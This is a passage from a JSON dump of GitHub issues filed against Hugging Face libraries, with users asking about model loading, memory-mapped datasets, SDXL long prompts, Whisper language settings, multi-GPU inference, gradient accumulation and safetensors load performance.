\r\n\r\n### Motivation\r\n\r\nI fine-tuned IDEFICS on a custom dataset, but when I load it, it shows an error.\r\n\r\n\r\n### Your contribution\r\n\r\nAdd a class like AutoPeftModelforVisionTextToText() to easily load the model.", "url": "https://github.com/huggingface/peft/issues/857", "state": "closed", "labels": [], "created_at": "2023-08-24T12:34:44Z", "updated_at": "2023-09-01T15:46:50Z", "user": "imrankh46" }, { "repo": "huggingface/datasets", "number": 6176, "title": "how to limit the size of memory mapped file?", "body": "### Describe the bug\n\nHugging Face datasets use memory-mapped files to map large datasets in memory for fast access.\r\nHowever, it seems like the library will occupy all the memory for memory-mapped files, which is troublesome since our cluster only grants a small portion of memory to my job (once it's over the limit, memory cannot be allocated). When the dataset checks the total memory, all of the memory is taken into account, which makes the dataset try to allocate more memory than allowed. \r\nSo is there a way to explicitly limit the size of the memory-mapped file?\n\n### Steps to reproduce the bug\n\npython\r\n>>> from datasets import load_dataset\r\n>>> dataset = load_dataset(\"c4\", \"en\", streaming=True)\n\n### Expected behavior\n\nIn a normal environment, this will not cause any problem.\r\nHowever, when the system allocates only a portion of the memory to the program, the dataset still checks the total memory, so all of it is taken into account and the dataset tries to allocate more memory than allowed. \n\n### Environment info\n\nLinux cluster with SGE (Sun Grid Engine)", "url": "https://github.com/huggingface/datasets/issues/6176", "state": "open", "labels": [], "created_at": "2023-08-24T05:33:45Z", "updated_at": "2023-10-11T06:00:10Z", "user": "williamium3000" }, { "repo": "huggingface/autotrain-advanced", "number": 225, "title": "How to make inference the model", "body": "When I launch \r\n**autotrain llm --train --project_name my-llm --model meta-llama/Llama-2-7b-hf --data_path . --use_peft --use_int4 --learning_rate 2e-4 --train_batch_size 2 --num_train_epochs 3 --trainer sft**\r\n\r\nI get this output\r\n![autoTrainDoubt](https://github.com/huggingface/autotrain-advanced/assets/30750249/ac813d13-d4a4-43f4-901a-372fdaec045b)\r\n\r\n**I have two questions.**\r\n**1.-** The output says that the training is finished; however, I only see the log of 1 epoch. **Is there any way to see the 'training loss' param for all 3 epochs?**\r\n\r\n**2.-** After training, I try to run inference with the Text-generation-inference HF application. However, I get an error because config.json is not in the model folder. The output model is this. **Why is this file not present? Should I do something more?**\r\n\r\n![autoTrainDoubt1](https://github.com/huggingface/autotrain-advanced/assets/30750249/2af0d7fe-526c-4646-aa64-9adf6d70632f)\r\n\r\n", "url": "https://github.com/huggingface/autotrain-advanced/issues/225", "state": "closed", "labels": [], "created_at": "2023-08-23T20:24:23Z", "updated_at": "2023-12-18T15:30:40Z", "user": "amgomezdev" }, { "repo": "huggingface/autotrain-advanced", "number": 223, "title": "How to use captions with Dreambooth?", "body": "I'm trying to train an SDXL model with Dreambooth using captions for each image (I have found that this made quite a difference when training for style with the 1.5 model). How can I achieve that using autotrain? 
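For concreteness, this is the kind of layout I have in mind, where each file name doubles as its caption (names are made up):\r\n\r\n```\r\nimages/\r\n    a_painting_of_a_castle_in_sks_style.png\r\n    a_painting_of_a_harbour_in_sks_style.png\r\n```\r\n\r\n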
If I understand [this line](https://github.com/huggingface/autotrain-advanced/blob/main/src/autotrain/trainers/dreambooth/main.py#L290C13-L290C13) correctly, it will pick it up if it's in the file name, is that right? And if yes, how does it play together with the specified prompt?\r\n", "url": "https://github.com/huggingface/autotrain-advanced/issues/223", "state": "closed", "labels": [], "created_at": "2023-08-23T15:32:16Z", "updated_at": "2023-12-18T15:30:39Z", "user": "MaxGfeller" }, { "repo": "huggingface/trl", "number": 677, "title": "how to run reward_trainer.py", "body": "ValueError: Some specified arguments are not used by the HfArgumentParser: ['-f', '/Users/samittan/Library/Jupyter/runtime/kernel-32045810-5e16-48f4-8d44-c7a7f975f8a4.json']\r\n\r\n", "url": "https://github.com/huggingface/trl/issues/677", "state": "closed", "labels": [], "created_at": "2023-08-23T09:39:52Z", "updated_at": "2023-11-02T15:05:32Z", "user": "samitTAN" }, { "repo": "huggingface/chat-ui", "number": 412, "title": "preprompt not being injected for Llama 2", "body": "1. When I alter the preprompt for a Llama 2 type model, it appears to have no impact. It's as though the preprompt is not there. Sample config for .env.local:\r\n\r\n```\r\nMODELS=`[\r\n{\r\n \"name\": \"Trelis/Llama-2-7b-chat-hf-function-calling\",\r\n \"datasetName\": \"Trelis/function_calling_extended\",\r\n \"description\": \"function calling Llama-7B-chat\",\r\n \"websiteUrl\": \"https://research.Trelis.com\",\r\n \"preprompt\": \"Respond in French to all questions\",\r\n \"userMessageToken\": \"[INST]\",\r\n \"assistantMessageToken\": \"[/INST]\",\r\n \"parameters\": {\r\n \"temperature\": 0.01,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024\r\n },\r\n \"endpoints\": [{\r\n \"url\": \"http://127.0.0.1:8080\"\r\n }]\r\n}\r\n]`\r\n```\r\n\r\nOther notes:\r\n- The same model responds to changes in the system message when run in Colab.\r\n\r\n- Here, with chat-ui, I'm running with a TGI server.\r\n\r\n- Llama-chat has weird templating whereby the first system and user messages have to be wrapped in INST. The best that can be done with the default templating is to separately wrap the system message and each user input in [INST] and [/INST]. That said, I don't think that deviation should be significant enough to mean that the preprompt is ignored... but maybe it is, OR maybe I'm making some other mistake?", "url": "https://github.com/huggingface/chat-ui/issues/412", "state": "closed", "labels": [ "support", "models" ], "created_at": "2023-08-23T09:15:24Z", "updated_at": "2023-09-18T12:48:07Z", "comments": 7, "user": "RonanKMcGovern" }, { "repo": "huggingface/unity-api", "number": 15, "title": "How to download the model to the local call API", "body": "Because my internet connection is not very good, I would like to download the model to my local machine and call it through the Hugging Face API. How can I achieve this?", "url": "https://github.com/huggingface/unity-api/issues/15", "state": "closed", "labels": [], "created_at": "2023-08-23T08:08:40Z", "updated_at": "2023-11-08T10:26:34Z", "user": "haldon98" }, { "repo": "huggingface/evaluate", "number": 485, "title": "How to use `SubTask` with metrics that require valid `config_name`", "body": "## Issue \r\n\r\nCurrently there does not seem to be a way to define the `config_name` of a metric for a `SubTask` inside an `evaluate.EvaluationSuite`. 
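What I would like to write is something like the sketch below; the `\"config_name\"` key is hypothetical and does not exist today:\r\n\r\n```python\r\nSubTask(\r\n    task_type=\"text-classification\",\r\n    data=\"glue\",\r\n    subset=\"sst2\",\r\n    split=\"validation[:10]\",\r\n    args_for_task={\r\n        \"metric\": \"glue\",\r\n        # hypothetical: would be forwarded to evaluate.load(metric, config_name=...)\r\n        \"config_name\": \"sst2\",\r\n        \"input_column\": \"sentence\",\r\n        \"label_column\": \"label\",\r\n    },\r\n)\r\n```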
\r\n\r\n## Version\r\n\r\nevaluate version: 0.4.0\r\ntransformers version 4.32.0\r\nPython version Python 3.10.6\r\n\r\n## Example\r\n\r\nFor example, consider the following `EvaluationSuite` which tried to run the \"glue\" metric which requires a `config_name` when calling `evaluate.load`:\r\n\r\nCode in `suite.py`:\r\n```python \r\nimport evaluate\r\nfrom evaluate.evaluation_suite import SubTask\r\nclass Suite(evaluate.EvaluationSuite):\r\n\r\n def __init__(self, name):\r\n super().__init__(name)\r\n self.preprocessor = lambda x: {\"text\": x[\"text\"].lower()}\r\n self.suite = [\r\n SubTask(\r\n task_type=\"text-classification\",\r\n data=\"glue\",\r\n subset=\"sst2\",\r\n split=\"validation[:10]\",\r\n args_for_task={\r\n \"metric\": \"glue\",\r\n \"input_column\": \"sentence\",\r\n \"label_column\": \"label\",\r\n \"label_mapping\": {\r\n \"LABEL_0\": 0.0,\r\n \"LABEL_1\": 1.0\r\n }\r\n }\r\n ),\r\n]\r\n```\r\nNow consider running this `EvaluationSuite` with the following:\r\n\r\n```python\r\nfrom evaluate import EvaluationSuite\r\nsuite = EvaluationSuite.load('suite.py')\r\nresults = suite.run(\"gpt2\")\r\n```\r\n\r\nRunning this code results in the following error:\r\n\r\n```\r\n---------------------------------------------------------------------------\r\nKeyError Traceback (most recent call last)\r\nCell In[60], line 2\r\n 1 suite = EvaluationSuite.load('suite.py')\r\n----> 2 results = suite.run(\"gpt2\")\r\n\r\nFile /localdisk/twilbers/src/notebooks/poc/glue/.venv/lib/python3.10/site-packages/evaluate/evaluation_suite/__init__.py:124, in EvaluationSuite.run(self, model_or_pipeline)\r\n 122 args_for_task[\"subset\"] = task.subset\r\n 123 args_for_task[\"split\"] = task.split\r\n--> 124 results = task_evaluator.compute(**args_for_task)\r\n 126 results[\"task_name\"] = task_name + \"/\" + task.subset if task.subset else task_name\r\n 127 results[\"data_preprocessor\"] = str(task.data_preprocessor) if task.data_preprocessor is not None else None\r\n\r\nFile /localdisk/twilbers/src/notebooks/poc/glue/.venv/lib/python3.10/site-packages/evaluate/evaluator/text_classification.py:136, in TextClassificationEvaluator.compute(self, model_or_pipeline, data, subset, split, metric, tokenizer, feature_extractor, strategy, confidence_level, n_resamples, device, random_state, input_column, second_input_column, label_column, label_mapping)\r\n 127 metric_inputs, pipe_inputs = self.prepare_data(\r\n 128 data=data, input_column=input_column, second_input_column=second_input_column, label_column=label_column\r\n 129 )\r\n 130 pipe = self.prepare_pipeline(\r\n 131 model_or_pipeline=model_or_pipeline,\r\n 132 tokenizer=tokenizer,\r\n 133 feature_extractor=feature_extractor,\r\n 134 device=device,\r\n 135 )\r\n--> 136 metric = self.prepare_metric(metric)\r\n 138 # Compute predictions\r\n 139 predictions, perf_results = self.call_pipeline(pipe, pipe_inputs)\r\n\r\nFile /localdisk/twilbers/src/notebooks/poc/glue/.venv/lib/python3.10/site-packages/evaluate/evaluator/base.py:447, in Evaluator.prepare_metric(self, metric)\r\n 445 metric = load(self.default_metric_name)\r\n 446 elif isinstance(metric, str):\r\n--> 447 metric = load(metric)\r\n 449 return metric\r\n\r\nFile /localdisk/twilbers/src/notebooks/poc/glue/.venv/lib/python3.10/site-packages/evaluate/loading.py:735, in load(path, config_name, module_type, process_id, num_process, cache_dir, experiment_id, keep_in_memory, download_config, download_mode, revision, **init_kwargs)\r\n 731 evaluation_module = evaluation_module_factory(\r\n 732 path, 
module_type=module_type, revision=revision, download_config=download_config, download_mode=download_mode\r\n 733 )\r\n 734 evaluation_cls = import_main_class(evaluation_module.module_path)\r\n--> 735 evaluation_instance = evaluation_cls(\r\n 736 config_name=config_name,\r\n 737 process_id=process_id,\r\n 738 num_process=num_process,\r\n 739 cache_dir=cache_dir,\r\n 740 keep_in_memory=keep_in_memory,\r\n 741 experiment_id=experiment_id,\r\n 742 hash=evaluation_module.hash,\r\n 743 **init_kwargs,\r\n 744 )\r\n 746 if module_type and module_type != evaluation_instance.module_type:\r\n 747 raise TypeError(\r\n 748 f\"No module of module type '{module_type}' not found for '{path}' locally, or on the Hugging Face Hub. Found module of module type '{evaluation_instance.module_type}' instead.\"\r\n 749 )\r\n\r\nFile /localdisk/twilbers/src/notebooks/poc/glue/.venv/lib/python3.10/site-packages/evaluate/module.py:182, in EvaluationModule.__init__(self, config_name, keep_in_memory, cache_dir, num_process, process_id, seed, experiment_id, hash, max_conc", "url": "https://github.com/huggingface/evaluate/issues/485", "state": "open", "labels": [], "created_at": "2023-08-22T23:15:43Z", "updated_at": "2023-08-23T16:38:18Z", "user": "tybrs" }, { "repo": "huggingface/diffusers", "number": 4716, "title": "How to handle SDXL long prompt", "body": "### Describe the bug\n\nI am unable to use embeds prompt in order to handle prompt that is longer than 77 tokens.\n\n### Reproduction\n\n```python\r\nimport itertools\r\nimport os.path\r\nimport random\r\nimport string\r\nimport time\r\nimport typing as typ\r\n\r\nimport torch\r\nfrom diffusers import StableDiffusionXLPipeline\r\nfrom tqdm import tqdm\r\n\r\nimport bb\r\nfrom web_sdxl import seed_everything\r\n\r\nseed_everything(42)\r\n\r\n\r\ndef generate_random_string(length):\r\n letters = string.ascii_letters\r\n result = ''.join(random.choice(letters) for _ in range(length))\r\n return result\r\n\r\n\r\ndef get_pipeline_embeds(pipeline, prompt, negative_prompt, device):\r\n \"\"\" Get pipeline embeds for prompts bigger than the maxlength of the pipe\r\n :param pipeline:\r\n :param prompt:\r\n :param negative_prompt:\r\n :param device:\r\n :return:\r\n \"\"\"\r\n max_length = pipeline.tokenizer.model_max_length\r\n\r\n # simple way to determine length of tokens\r\n count_prompt = len(prompt.split(\" \"))\r\n count_negative_prompt = len(negative_prompt.split(\" \"))\r\n\r\n # create the tensor based on which prompt is longer\r\n if count_prompt >= count_negative_prompt:\r\n input_ids = pipeline.tokenizer(prompt, return_tensors=\"pt\", truncation=False).input_ids.to(device)\r\n shape_max_length = input_ids.shape[-1]\r\n negative_ids = pipeline.tokenizer(negative_prompt, truncation=False, padding=\"max_length\",\r\n max_length=shape_max_length, return_tensors=\"pt\").input_ids.to(device)\r\n\r\n else:\r\n negative_ids = pipeline.tokenizer(negative_prompt, return_tensors=\"pt\", truncation=False).input_ids.to(device)\r\n shape_max_length = negative_ids.shape[-1]\r\n input_ids = pipeline.tokenizer(prompt, return_tensors=\"pt\", truncation=False, padding=\"max_length\",\r\n max_length=shape_max_length).input_ids.to(device)\r\n\r\n concat_embeds = []\r\n neg_embeds = []\r\n for i in range(0, shape_max_length, max_length):\r\n concat_embeds.append(pipeline.text_encoder(input_ids[:, i: i + max_length])[0])\r\n neg_embeds.append(pipeline.text_encoder(negative_ids[:, i: i + max_length])[0])\r\n\r\n return torch.cat(concat_embeds, dim=1), torch.cat(neg_embeds, 
dim=1)\r\n\r\n\r\nmodel_path = \"fine_tuned_models/sdxl-sarit\"\r\ndevice = \"mps\" if torch.backends.mps.is_available() else \"cpu\"\r\nout_dir: str = \"gluta40\"\r\n\r\nage_prompts: typ.List[str] = [\r\n \"young asian girl\",\r\n \"a photograph of an angel with sly expression, wearing a see-thru short roman style dress, beautiful asian mixed european woman face, beautiful eyes, black hair, looking down, hyper realistic and detailed, 16k\",\r\n]\r\nhand_prompts: typ.List[str] = [\r\n \"left hand holding a gluta40 jar one hand, right hand is behind her back\",\r\n \"right hand holding a gluta40 jar one hand, left hand is behind her back\",\r\n]\r\nface_angle_prompts: typ.List[str] = [\r\n \"straight face\",\r\n]\r\nhair_prompts: typ.List[str] = [\r\n \"black long tied hair\",\r\n \"black long hair\",\r\n]\r\nbackground_prompts: typ.List[str] = [\r\n \"no background, hold both hands, bad hands\",\r\n]\r\nnegative_prompt: str = \"disfigured, disproportionate, bad anatomy, bad proportions, ugly, out of frame, mangled, asymmetric, cross-eyed, depressed, immature, stuffed animal, out of focus, high depth of field, cloned face, cloned head, age spot, skin blemishes, collapsed eyeshadow, asymmetric ears, imperfect eyes, unnatural, conjoined, missing limb, missing arm, missing leg, poorly drawn face, poorly drawn feet, poorly drawn hands, floating limb, disconnected limb, extra limb, malformed limbs, malformed hands, poorly rendered face, poor facial details, poorly rendered hands, double face, unbalanced body, unnatural body, lacking body, long body, cripple, cartoon, 3D, weird colors, unnatural skin tone, unnatural skin, stiff face, fused hand, skewed eyes, surreal, cropped head, group of people, too many fingers, bad hands, six fingers\"\r\ncombined_list = list(itertools.product(age_prompts, hand_prompts, face_angle_prompts, hair_prompts, background_prompts))\r\nrandom.shuffle(combined_list)\r\n\r\nfor item in tqdm(combined_list, total=len(combined_list)):\r\n age, hand, face_angle, hair, background = item\r\n if not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n prompt: str = \", \".join(item)\r\n print(prompt)\r\n out_filename: str = f\"{out_dir}/{prompt.replace(' ', '_')}\"\r\n if not os.path.exists(f\"{out_filename}_0.png\"):\r\n try:\r\n pipe = StableDiffusionXLPipeline.from_pretrained(model_path, safety_checker=None,\r\n requires_safety_checker=False)\r\n pipe.to(device)\r\n prompt_embeds, negative_prompt_embeds = get_pipeline_embeds(pipe, prompt, negative_prompt, device)\r\n images = pipe(prompt_embeds=prompt_embeds, negative_prompt_embeds=negative_prompt_embeds,\r\n num_images_per_prompt=3, width=768,\r\n ", "url": "https://github.com/huggingface/diffusers/issues/4716", "state": "closed", "labels": [ "bug" ], "created_at": "2023-08-22T16:28:25Z", "updated_at": "2023-08-27T02:46:18Z", "user": "elcolie" }, { "repo": "huggingface/candle", "number": 547, "title": "How to turn off automatic translation for whisper", "body": "When I input Chinese wav file , whisper outputs the English translation\r\n```\r\nls@LeeeSes-MacBook-Air ~/r/candle (main)> cargo run --release --features accelerate --example whisper -- --model small --language zh --input /Users/ls/Downloads/output.wav\r\n Finished release [optimized] target(s) in 0.38s\r\n Running `target/release/examples/whisper --model small --language zh --input /Users/ls/Downloads/output.wav`\r\nRunning on CPU, to run on GPU, build this example with `--features cuda`\r\nloaded wav data: Header { audio_format: 1, channel_count: 1, 
sampling_rate: 16000, bytes_per_second: 32000, bytes_per_sample: 2, bits_per_sample: 16 }\r\npcm data loaded 287216\r\nloaded mel: [1, 80, 4500]\r\n0.0s -- 30.0s: This is a free online audio recorder application program. You can record sound from microphone. After recording, you can edit sound and edit any parts, adjust the balance and sound. Let's use the recording first.\r\n30.0s -- 45.0s: I'm sorry.\r\n```", "url": "https://github.com/huggingface/candle/issues/547", "state": "closed", "labels": [], "created_at": "2023-08-22T11:16:45Z", "updated_at": "2023-08-22T18:52:40Z", "user": "LeeeSe" }, { "repo": "huggingface/trl", "number": 674, "title": "How to load the model and the checkpoint after trained the model?", "body": "I trained my model using the code in sft_trainer.py, and I saved the checkpoint and the model in the same dir.\r\nBut I don't know how to load the model with the checkpoint. Or rather, I just want to know whether `trainer.save_model(script_args.output_dir)` means I have saved a trained model, not just a checkpoint? \r\nI have tried many ways to load the trained model, but I get errors like \r\n```\r\nRuntimeError: Error(s) in loading state_dict for PrefixEncoder:\r\n\tMissing key(s) in state_dict: \"embedding.weight\". \r\n```\r\nSo, how do I load the model?", "url": "https://github.com/huggingface/trl/issues/674", "state": "closed", "labels": [], "created_at": "2023-08-22T10:31:01Z", "updated_at": "2023-11-27T21:34:30Z", "user": "ccwdb" }, { "repo": "huggingface/text-generation-inference", "number": 899, "title": "text-generation-launcher tool how to use multi gpu cards?", "body": "### System Info\n\nHow do I use multiple GPU cards with text-generation-launcher 1.0.0?\r\n\n\n### Information\n\n- [ ] Docker\n- [X] The CLI directly\n\n### Tasks\n\n- [X] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nCUDA_VISIBLE_DEVICES=0,1,2,3 text-generation-launcher --model-id falcon-40b-instruct --sharded true --num-shard 1 --quantize bitsandbytes-fp4 does not use multiple A10 GPU cards. It fails on GPU 0 with OutOfMemoryError: CUDA out of memory.\n\n### Expected behavior\n\nThe model loads normally and serves HTTP POST requests.", "url": "https://github.com/huggingface/text-generation-inference/issues/899", "state": "closed", "labels": [], "created_at": "2023-08-22T10:09:17Z", "updated_at": "2023-08-22T10:13:06Z", "user": "luefei" }, { "repo": "huggingface/chat-ui", "number": 411, "title": "Chat-ui crashes TGI?", "body": "Hey!\r\n\r\nWhen I deploy a TGI endpoint locally and test it with the following CLI request: \r\n\r\n`curl 127.0.0.1:8080/generate_stream \\\r\n -X POST \\\r\n -d '{\"inputs\":\"def calculate_fibonacci(n:str):\",\"parameters\":{\"max_new_tokens\":100}}' \\\r\n -H 'Content-Type: application/json'`\r\n\r\nIt works without any problem. 
Even load tests with locust.io work without problems.\r\n\r\nThis is the response from tgi with the curl command: \r\n\r\n`2023-08-22T08:29:52.944813Z INFO HTTP request{otel.name=POST /generate_stream http.client_ip= http.flavor=1.1 http.host=127.0.0.1:8080 http.method=POST http.route=/generate_stream http.scheme=HTTP http.target=/generate_stream http.user_agent=curl/7.82.0 otel.kind=server trace_id=772a4a52f29b540aac2b3b331ea5247a http.status_code=200 otel.status_code=\"OK\"}:generate_stream{parameters=GenerateParameters { best_of: None, temperature: None, repetition_penalty: None, top_k: None, top_p: None, typical_p: None, do_sample: false, max_new_tokens: 100, return_full_text: None, stop: [], truncate: None, watermark: false, details: false, decoder_input_details: false, seed: None } total_time=\"5.639886919s\" validation_time=\"153.888\u00b5s\" queue_time=\"184.627\u00b5s\" inference_time=\"5.639548636s\" time_per_token=\"56.395486ms\" seed=\"None\"}: text_generation_router::server: router/src/server.rs:452: Success`\r\n\r\nBut if I want to call tgi with the chat-ui it works the first time (I get an streaming response in the chat-ui), but then the tgi freezes?\r\nEDIT: This is the output I get from tgi (I get two responses from tgi?):\r\n\r\n`2023-08-22T11:38:32.027037Z INFO HTTP request{otel.name=POST / http.client_ip= http.flavor=1.1 http.host=127.0.0.1:8080 http.method=POST http.route=/ http.scheme=HTTP http.target=/ http.user_agent=undici otel.kind=server trace_id=a55b57fc395cc1f8fa59dcd111733cd4 http.status_code=200 otel.status_code=\"OK\"}:compat_generate{default_return_full_text=false}:generate_stream{parameters=GenerateParameters { best_of: None, temperature: Some(0.9), repetition_penalty: Some(1.2), top_k: Some(50), top_p: Some(0.95), typical_p: None, do_sample: false, max_new_tokens: 1048, return_full_text: Some(false), stop: [], truncate: Some(1000), watermark: false, details: false, decoder_input_details: false, seed: None } total_time=\"1.803072692s\" validation_time=\"139.35\u00b5s\" queue_time=\"209.805\u00b5s\" inference_time=\"1.802724034s\" time_per_token=\"56.335126ms\" seed=\"Some(14814785333613176252)\"}: text_generation_router::server: router/src/server.rs:450: Success\r\n`\r\n\r\n`\r\n2023-08-22T11:38:32.643776Z INFO HTTP request{otel.name=POST / http.client_ip= http.flavor=1.1 http.host=127.0.0.1:8080 http.method=POST http.route=/ http.scheme=HTTP http.target=/ http.user_agent=undici otel.kind=server trace_id=7064d891ae5c88c74aaba2f06cacd5d3}:compat_generate{default_return_full_text=false}:generate{parameters=GenerateParameters { best_of: None, temperature: None, repetition_penalty: None, top_k: None, top_p: None, typical_p: None, do_sample: false, max_new_tokens: 20, return_full_text: Some(false), stop: [], truncate: None, watermark: false, details: false, decoder_input_details: false, seed: None } total_time=\"519.787388ms\" validation_time=\"77.98\u00b5s\" queue_time=\"78.433\u00b5s\" inference_time=\"519.63134ms\" time_per_token=\"57.736815ms\" seed=\"None\"}: text_generation_router::server: router/src/server.rs:287: Success`\r\n\r\nEDIT: I get the following output in my terminal with the second response from tgi: \r\n\r\n`\r\nSyntaxError: Unexpected token d in JSON at position 0\r\n at JSON.parse ()\r\n at Module.generateFromDefaultEndpoint (/Users/xx/Desktop/chat-ui/src/lib/server/generateFromDefaultEndpoint.ts:73:30)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async POST 
(/Users/xx/Desktop/chat-ui/src/routes/conversation/[id]/summarize/+server.ts:30:26)\r\n at async Module.render_endpoint (/Users/xx/Desktop/chat-ui/node_modules/@sveltejs/kit/src/runtime/server/endpoint.js:47:20)\r\n at async resolve (/Users/xx/Desktop/chat-ui/node_modules/@sveltejs/kit/src/runtime/server/respond.js:388:17)\r\n at async Object.handle (/Users/xx/Desktop/chat-ui/src/hooks.server.ts:66:20)\r\n at async Module.respond (/Users/xx/Desktop/chat-ui/node_modules/@sveltejs/kit/src/runtime/server/respond.js:259:20)\r\n at async file:///Users/xx/Desktop/chat-ui/node_modules/@sveltejs/kit/src/exports/vite/dev/index.js:506:22`\r\n\r\nchat-ui version: 0.5.0\r\ntgi-version: 1.0.1\r\n\r\nChat-UI Model Config: \r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"Vicuna\",\r\n \"datasetName\": \"OpenAssistant/oasst1\",\r\n \"endpoints\": [{\"url\": \"http://127.0.0.1:8080/generate_stream\"}],\r\n \"description\": \"A good alternative to ChatGPT\",\r\n \"websiteUrl\": \"https://open-assistant.io\",\r\n \"userMessageToken\": \"USER:\",\r\n \"assistantMessageToken\": \"ASSISTANT:\",\r\n \"messageEndToken\": \"\",\r\n \"preprompt\": \"A chat between a curious user and an artificial intelligence assistant. The assistant gives helpful, detailed, and polite answers to the user's questions.\\n\\n", "url": "https://github.com/huggingface/chat-ui/issues/411", "state": "open", "labels": [], "created_at": "2023-08-22T08:48:02Z", "updated_at": "2023-08-23T06:45:26Z", "comments": 0, "user": "schauppi" }, { "repo": "huggingface/accelerate", "number": 1870, "title": "[Question] How to optimize two loss alternately with gradient accumulation?", "body": "I want to update a model by optimizing two loss alternately with gradient accumulation like this\r\n\r\n```python\r\n# Suppose gradient_accumulation is set to 2.\r\noptimizer = optim(unet.parameters())\r\nwith accelerator.accumulate(unet):\r\n outputs = unet(input)\r\n loss1 = loss_func1(outputs)\r\n loss1.backward()\r\n optimizer.step()\r\n optimizer.zero_grad()\r\n\r\nwith accelerator.accumulate(unet):\r\n outputs = unet(input)\r\n loss2 = loss_func2(outputs)\r\n loss2.backward()\r\n optimizer.step()\r\n optimizer.zero_grad()\r\n```\r\n\r\nIs this correct? It appears from the [documentation](https://huggingface.co/docs/accelerate/usage_guides/gradient_accumulation#converting-it-to-accelerate) that `accelerator.accumulate` will normalize the loss and then backpropagate without updating the gradient until reaching `gradient_accumulation_steps`. My main concern is that the gradients accumulated by two different losses for the same model will affect each other.\r\n\r\nHope to find some help here, thanks in advance.", "url": "https://github.com/huggingface/accelerate/issues/1870", "state": "closed", "labels": [], "created_at": "2023-08-21T12:49:19Z", "updated_at": "2023-10-24T15:06:33Z", "user": "hkunzhe" }, { "repo": "huggingface/candle", "number": 538, "title": "How to disable openssl-sys being included?", "body": "I would like to stop openssl-sys from being included in my project when using candle, I'm not sure how to do this. I tried adding the below to my Cargo.toml but it didn't change anything. The reason I want to do it is because I get an error when trying to compile my library to aarch64-linux-android saying that pkg-config has not been configured to support cross-compilation and that I should install a sysroot for the target platform, but I'd like to not include it anyways since I won't be needing it and will be loading everything locally. 
Thanks.\r\n\r\n```\r\nhf-hub = { version = \"0.2.0\", default-features = false }\r\ntokenizers = { version = \"0.13.4\", default-features = false }\r\n```", "url": "https://github.com/huggingface/candle/issues/538", "state": "closed", "labels": [], "created_at": "2023-08-21T10:47:26Z", "updated_at": "2023-08-21T20:38:57Z", "user": "soupslurpr" }, { "repo": "huggingface/optimum", "number": 1298, "title": "Support BetterTransfomer for the Baichuan LLM model", "body": "### Feature request\n\nis it possible to support Baichuan model with BetterTransformer?\r\n\r\nhttps://huggingface.co/baichuan-inc/Baichuan-13B-Chat\n\n### Motivation\n\nA very popular Chinese and English large language model.\n\n### Your contribution\n\nhope you can achieve it. Thanks.", "url": "https://github.com/huggingface/optimum/issues/1298", "state": "closed", "labels": [ "feature-request", "bettertransformer", "Stale" ], "created_at": "2023-08-21T08:18:16Z", "updated_at": "2025-05-04T02:17:22Z", "comments": 1, "user": "BobLiu20" }, { "repo": "huggingface/candle", "number": 533, "title": "How to convert token to text?", "body": "Hello, thank you for this ML library in Rust. Sorry if this is a noob question, I'm new to machine learning and this is my first time trying to use a text generation model. I'm using the latest git version. In the quantized llama example, how would I convert a token to a string? I see the print_token function but I want to convert it to a string and maybe push to a vector so I can return all the generated text when it is finished processing. ", "url": "https://github.com/huggingface/candle/issues/533", "state": "closed", "labels": [], "created_at": "2023-08-21T06:36:08Z", "updated_at": "2023-08-21T07:51:37Z", "user": "soupslurpr" }, { "repo": "huggingface/safetensors", "number": 333, "title": "Slow load weight values from a HF model on a big-endian machine with the latest code", "body": "### System Info\r\n\r\nPython: 3.10\r\nPyTorch: the latest main branch (i.e. 2.0.1+)\r\nsafetensors: 0.3.3\r\nPlatform: s390x (big-endian)\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Reproduction\r\n\r\nI executed the following code using 0.3.1 and 0.3.3, and w/o safetensors.\r\n\r\n```\r\nimport time\r\nimport torch\r\nfrom transformers import T5ForConditionalGeneration, AutoTokenizer\r\ntry:\r\n import safetensors \r\n print(\"safetensors version:\", safetensors.__version__)\r\nexcept:\r\n print(\"safetensors not installed\")\r\ntorch.serialization.set_default_load_endianness(torch.serialization.LoadEndianness.LITTLE)\r\n\r\nmodel = \"google/flan-t5-xxl\"\r\ntokenizer = AutoTokenizer.from_pretrained(model)\r\ninput_text = \"The square root of x is the cube root of y. 
What is y to the power of 2, if x = 4?\"\r\ninput = tokenizer(input_text, return_tensors=\"pt\").input_ids\r\n\r\nt0 = time.perf_counter()\r\n#model = T5ForConditionalGeneration.from_pretrained(model, low_cpu_mem_usage=True, use_safetensors=False)\r\nmodel = T5ForConditionalGeneration.from_pretrained(model, low_cpu_mem_usage=True, use_safetensors=True)\r\nt1 = time.perf_counter()\r\nprint(\"load elapsed time:\", t1-t0)\r\noutput = model.decoder.forward(input_ids=input) ## intentionally use decoder.forward() instead of generate()\r\nt2 = time.perf_counter()\r\nprint(\"forward elapsed time:\", t2-t1)\r\n```\r\n\r\nFindings\r\n- Old version (0.3.1) w/o swapping data is quite faster than 0.3.3 w/ swapping data, which we understand.\r\n- 0.3.3 is a bit slow than `torch.load`, which implies we could have some room to improve.\r\n\r\nThe result is the best time of five tries after I downloaded model files into local file system.\r\n\r\n```\r\n$ python flan-t5.py \r\nsafetensors not installed\r\nLoading checkpoint shards: 